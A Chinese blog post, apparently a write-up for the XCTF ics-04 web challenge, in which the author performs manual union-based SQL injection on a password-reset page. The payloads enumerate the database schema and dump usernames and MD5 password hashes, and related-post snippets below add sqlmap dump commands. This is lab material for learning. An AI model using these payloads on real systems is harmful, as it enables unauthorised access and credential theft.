攻防世界-高手进阶区之ics-04

最新推荐文章于 2020-11-26 17:47:27 发布
最新推荐文章于 2020-11-26 17:47:27 发布
阅读量810 收藏 1
点赞数
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sacrifice_li/article/details/106698779
版权

进来页面是这样的:

注册页面:

我们就尝试随便注册一个用户,然后登陆发现没啥用:

这里还有一个忘记密码可以点击:

可以猜测这里有没有注入漏洞:

我注册的用户名为1,然后去试试 1’ and 1=1#  以及 1' and 1=2# ,发现是存在注入漏洞的。

然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4:

3的位置是回显位置,接下来就是去找数据库名:

-1' union select 1,2,group_concat(schema_name),4 from information_schema.schemata #

数据名为cetc004,接下来是表名:

-1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema="cetc004"#

表名为user,然后是字段:

-1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema="cetc004"#

接下来就是去找用户名和密码了:

-1' union select 1,2,group_concat(username),4 from cetc004.user#

用户名为如图↑

然后是密码:

-1' union select 1,2,group_concat(password),4 from cetc004.user#

如果熟知c4ca4238a0b923820dcc509a6f75849b这个是1做md5加密后的结果就很容易了,不然还要猜测一下,那么我们就把第一个拿去做md5解密:

然后拿这个去登录,就可以得到flag了:

Sacrifice_li
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4604
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4567
尝试
攻防世界 Ics 04
xiaoqi199915的博客
06-04 426
攻防世界 Ics 04 sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=a” -D cetc004 –tables user -C “username,password” --dump sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” sqlmap.py -u “http://124.126.19.106:521
攻防世界web高手进阶ics-04
weixin_43885355的博客
11-26 1553
攻防世界web高手进阶ics-04 这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是: https://blog.csdn.net/harry_c/article/details/98540820 写得粗糙多多见谅 实操 1、使用命令进行sql注入,猜解到4个数据库 cetc004 information_schema mysql performance_schema 2...
攻防世界ICS-04 writeup
a1004070060的博客
04-17 595
工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 1.根据提示先去登录注册页面,注册一个账号,尝试登录后提示普通用户登录也没用,估计我们需要登录管理员账号。 2.因为我注册了root和admin两个账号,都可以顺利注册且是普通用户,所以推测管理员账号应该不是想让我们通过这么简单的方式猜出来。接着去密码找回页面寻找突破口,输入我们之前注册的账号admin,果然有bug……找...
XCTF ics-04
qq_41941506的博客
05-20 2833
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
攻防世界 web高手进阶 8分题 ics-02
闵行小鱼塘
10-04 596
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是ics-02的writeup
攻防世界-PWN进阶-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1953
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
攻防世界 Misc高手进阶 3分题 3-11
闵行小鱼塘
11-15 1109
继续ctf的旅程,攻防世界Misc高手进阶的3分题,本篇是3-11的writeup
攻防世界-Web进阶-warmup题解
Jollowin的博客
11-26 822
warmup题解 我们进入到题目界面会看到一张猥琐的笑脸,假装没看到他直接按F12。 这里我们发现了一条线索:source.php。 好家伙,那我们不妨到source.php看一看: 进行代码审计,初步发现我们可以提交一个名为file的变量,若变量file的值为source.php或hint.php则会执行include $_REQUEST[‘file’]。 那我们不妨令file=hint.php看一看。 1.如上图我们发现底部出现了一行提示,那我们现在的目的就变成了让 include $_REQUE
攻防世界WEB进阶之isc-04
harry_c的博客
08-06 1809
攻防世界WEB进阶之isc-04第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 4星 题目来源: XCTF 4th-CyberEarth 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目页面是之前做过的,但是漏洞位置换了,在注册和登录页面,使用注册功能反复注册,返回的注册页面显示为普通用户注册,并且登录之后显示普通用户登录没什么用,猜想是否存在特殊的账...
CTF ics-04
艺博东的博客
10-05 9974
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
攻防世界web进阶ics-04
gongjingege的博客
08-03 230
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 考虑是否存在注入漏洞 只有三个地方可以点,登录,注册,忘记密码 先注册 普通用户登录没什么用,估计得管理员登录 登录和注册页面没有注入点,就忘记密码 测试后存在注入,1’or 1=1#绕过 手工测试,后台过滤了一部分,直接union select, 1’ union select 1,2,3,4# 页面回显正常 查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr
攻防世界 ics-04
freerats的博客
06-04 509
根据提示,漏洞在登入和注册页面,只看这两个地方就ok了 在注册页面发现可以重复注册 懒得一个个手测就直接用awvs扫一下,发现登录界面的忘记密码界面存在注入,手工试了一下 1’ or ‘1’='1 可以闭合 手工简单尝试了一下,没有找到有效的注入方式,用sqlmap看看能不能跑出来 跑出注入点和注入类型没有问题 接下来的比较顺利,常规的查数据库查表查列即可 查出列中的数据后,可以发现password是加密后的值,这个时候就可以利用重复注册这个漏洞,用这个账号密码去 ...
攻防世界web进阶ics-04详解
hxhxhxhxx的博客
08-07 282
攻防世界web进阶ics-04详解题目详解 题目 打开环境,发现就一个登录和注册功能可以用。还有一个用户找回密码功能。 详解 我们发现有三个入口 注册,登录,找回密码 我们使用sqlmap扫描,发现只有找回密码可以进行sql注入 python2 sqlmap.py -r -batch --dbs cert中只有一个表 user 我们看他字段 登录成功获取flag 当然,这是在可以获取到密码的情况 实际上我们并不能一定可以解决 那么我们可以进行重复注册 我们尝试去覆盖他的原来的账号密码,
攻防世界XCTF:ics-04
末初的CSDN博客
03-13 1115
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 3万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
[xctf]ics-04
胖胖的ALEX
07-10 4389
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-web-ics-04-从0到1的解题历程writeup
CTF小白的博客
04-15 3056
题目分析 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 尝试发现该靶机环境的主要功能为登陆、注册、找回密码,题目描述也是很直接,漏洞点就在这。 遇事不决先扫描一下网站有没有漏洞 发现在findpwd.php中存在sql注入漏洞 尝试联合查询 -1' union select 1,2,3,4--  -1' union select 1,2,(SELECT ...
攻防世界ics-06
最新发布
08-12
- *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值